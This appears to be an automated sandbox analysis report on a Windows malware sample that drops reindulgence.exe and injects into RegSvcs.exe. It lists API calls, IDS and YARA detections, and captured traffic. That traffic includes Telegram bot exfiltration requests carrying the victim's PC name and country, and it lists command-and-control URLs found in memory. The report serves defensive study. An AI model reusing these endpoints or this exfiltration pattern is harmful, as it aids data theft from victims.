Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Code function: 0_2_00B1979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_00B1979D
Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Code function: 0_2_00B19B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	0_2_00B19B2B
Source: C:\Users\user\Desktop\oagkiAhXgZ.exe	Code function: 0_2_00B15C97 FindFirstFileW,FindNextFileW,FindClose,	0_2_00B15C97
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Code function: 2_2_00FCDBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,	2_2_00FCDBBE
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Code function: 2_2_00F9C2A2 FindFirstFileExW,	2_2_00F9C2A2
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Code function: 2_2_00FD68EE FindFirstFileW,FindClose,	2_2_00FD68EE
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Code function: 2_2_00FD698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,	2_2_00FD698F
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Code function: 2_2_00FCD076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	2_2_00FCD076
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Code function: 2_2_00FCD3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	2_2_00FCD3A9
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Code function: 2_2_00FD9642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_00FD9642
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Code function: 2_2_00FD979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_00FD979D
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Code function: 2_2_00FD9B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,	2_2_00FD9B2B
Source: C:\Users\user\AppData\Local\Thebesian\reindulgence.exe	Code function: 2_2_00FD5C97 FindFirstFileW,FindNextFileW,FindClose,	2_2_00FD5C97

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0275F8E9h	3_2_0275F631
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0275FD41h	3_2_0275FA88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 063331E0h	3_2_06332DC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06330D0Dh	3_2_06330B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06331697h	3_2_06330B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 06332C19h	3_2_06332968
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0633E0A9h	3_2_0633DE00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0633E959h	3_2_0633E6B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0633F209h	3_2_0633EF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0633CF49h	3_2_0633CCA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0633D7F9h	3_2_0633D550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 063331E0h	3_2_06332DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0633E501h	3_2_0633E258
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0633EDB1h	3_2_0633EB08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0633F661h	3_2_0633F3B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0633FAB9h	3_2_0633F810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	3_2_06330040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0633D3A1h	3_2_0633D0F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 063331E0h	3_2_0633310E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0633DC51h	3_2_0633D9A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0126F8E9h	7_2_0126F644
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 0126FD41h	7_2_0126FA9C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 01AD31E0h	7_2_01AD2DC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 01AD2C19h	7_2_01AD2968
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 01AD0D0Dh	7_2_01AD0B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 01AD1697h	7_2_01AD0B30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 01ADDC51h	7_2_01ADD9A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 01AD31E0h	7_2_01AD2DC3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 01AD31E0h	7_2_01AD310E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 01ADD7F9h	7_2_01ADD550
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 01ADCF49h	7_2_01ADCCA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 01ADD3A1h	7_2_01ADD0F8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 01ADFAB9h	7_2_01ADF810
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	7_2_01AD0040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	7_2_01AD0853
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 01ADF661h	7_2_01ADF3B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 01ADEDB1h	7_2_01ADEB08
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 01ADF209h	7_2_01ADEF60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 01ADE959h	7_2_01ADE6B0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 01ADE0A9h	7_2_01ADDE00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then mov dword ptr [ebp-14h], 00000000h	7_2_01AD0673
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 4x nop then jmp 01ADE501h	7_2_01ADE258

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49726 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.5:49844 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: 6.2.reindulgence.exe.1080000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.reindulgence.exe.1b40000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2261208813.0000000001080000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:610930%0D%0ADate%20and%20Time:%2008/01/2025%20/%2020:59:22%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20610930%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:610930%0D%0ADate%20and%20Time:%2008/01/2025%20/%2021:09:38%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20610930%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3
Source: Joe Sandbox View	IP Address: 188.114.96.3 188.114.96.3

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49707 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49704 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49772 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49754 -> 132.226.247.73:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49710 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49708 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49706 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49810 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49718 -> 188.114.96.3:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49766 -> 188.114.96.3:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49705 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.5:49760 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\oagkiAhXgZ.exe

Code function: 0_2_00B1CE44 InternetReadFile,SetEvent,GetLastError,SetEvent,

0_2_00B1CE44

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:610930%0D%0ADate%20and%20Time:%2008/01/2025%20/%2020:59:22%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20610930%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:610930%0D%0ADate%20and%20Time:%2008/01/2025%20/%2021:09:38%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20610930%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 08 Jan 2025 14:44:17 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 08 Jan 2025 14:44:34 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: reindulgence.exe, 00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4501322796.0000000000402000.00000040.80000000.00040000.00000000.sdmp, reindulgence.exe, 00000006.00000002.2261208813.0000000001080000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: reindulgence.exe, 00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4501322796.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4503499824.0000000002911000.00000004.00000800.00020000.00000000.sdmp, reindulgence.exe, 00000006.00000002.2261208813.0000000001080000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4503982433.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: reindulgence.exe, 00000002.00000002.2093048614.0000000001B40000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4501322796.0000000000402000.00000040.80000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4503499824.0000000002911000.00000004.00000800.00020000.00000000.sdmp, reindulgence.exe, 00000006.00000002.2261208813.0000000001080000.00000004.00001000.00020000.00000000.sdmp, RegSvcs.exe, 00000007.00000002.4503982433.0000000002FF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
